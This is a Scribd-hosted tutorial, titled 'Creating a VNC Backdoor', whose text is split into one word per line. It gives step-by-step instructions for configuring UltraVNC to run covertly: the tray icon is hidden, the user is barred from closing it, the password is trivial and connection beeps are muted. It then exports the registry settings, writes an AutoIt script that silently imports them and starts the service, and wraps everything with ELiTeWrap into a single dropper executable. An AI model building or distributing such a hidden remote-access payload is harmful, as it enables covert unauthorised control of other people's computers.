0% found this document useful (0 votes)
187 views

Creating A VNC Backdoor

The document provides instructions for creating a VNC backdoor on a system by installing UltraVNC, configuring it to automatically start on startup, and packaging the necessary files and scripts into a single executable payload using ELiTeWrap. Key steps include downloading and installing UltraVNC 1.0.2, modifying registry settings to disable notifications and require no password, creating an AutoIT script to automatically install the backdoor components, and using ELiTeWrap to bundle the files and script into a single executable payload.

Uploaded by

Fuad Abdullah
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
187 views

Creating A VNC Backdoor

The document provides instructions for creating a VNC backdoor on a system by installing UltraVNC, configuring it to automatically start on startup, and packaging the necessary files and scripts into a single executable payload using ELiTeWrap. Key steps include downloading and installing UltraVNC 1.0.2, modifying registry settings to disable notifications and require no password, creating an AutoIT script to automatically install the backdoor components, and using ELiTeWrap to bundle the files and script into a single executable payload.

Uploaded by

Fuad Abdullah
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 2

Creating
a
VNC
Backdoor


• Download
UltraVNC
1.0.2

o http://www.uvnc.com

• Install
UltraVNC

o Install
Path
C:\VNC

o Check
“Register
UltraVNC
Server
as
a
Service”

o Uncheck
“UltraVNC
Mirror
Driver”

o Uncheck
“DSM
Encryption
Plugin”

o Uncheck
“UltraVNC
Repeater”

• Setup
UltraVNC
Registry
Settings

o Start
Menu

UltraVNC

UltraVNC
Server

o Change
the
main
port
to
9090

o Check
“DisableTrayIcon”

o Check
“Disable
clients
options
in
tray
icon
menu”

o Check
“Forbid
the
user
to
close
down
WinVNC”

o Check
“Disable
Local
Inputs”

o Set
the
password
as
“password”

o Click
“OK”
when
done

• Package
Up
the
Payload

o Open
up
a
command
prompt

 cd
\VNC

 md
backdoor

 copy
winvnc.exe
backdoor

 copy
vnchooks.dll
backdoor

 cd
backdoor

 regedit
/E
vnc.reg

“HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC”

 regedit
/E
vnc2.reg

 “HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC\Default”

 notepad
vnc.reg

• Change
the
first
line
to

o REGEDIT4

• Add
the
following
lines
below
the

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC\D
EFAULT]

o “BeepConnect”=dword:00000000

o “BeepDisconnect”=dword:00000000

 notepad
vnc2.reg

• Copy
the
contents
under

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC\D
EFAULT]

o Paste
the
contents
in
vnc.reg

o AutoIT
Scripting

 Downloading
AutoIT
&
install

•http://www.autoitscript.com/cgi‐
bin/getfile.pl?autoit3/autoit‐v3‐setup.exe

 open
a
new
AutoIT
script
called
vncbd.au3

• Type
the
following
contents

o ShellExecute(“regedit.exe”,
“/S
vnc.reg”,
“”,
“”)

o ShellExecute(“winvnc.exe”,

“‐reinstall”,
“”,
“”)

o Sleep(2000)

o ShellExecute(“net.exe”,
“start
winvnc”,
“”,
“”)

• Save
and
compile
the
files

o Download
ELiTeWrap

 http://homepage.ntlworld.com/chawmp/elitewrap/

 Extract
the
contents
into
C:\VNC\backdoor

 Create
a
ELiTeWrap
script

• notepad
vnc_backdoor.ews

• Type
the
follwing

vncbackdoor.exe

n

winvnc.exe

1

vnchooks.dll

1

vnc.reg

1

vncbd.exe

3

~

• Save
the
file

 Package
the
files

• In
the
command
prompt

o elitewrap.exe
vnc.backdoor.ews


You might also like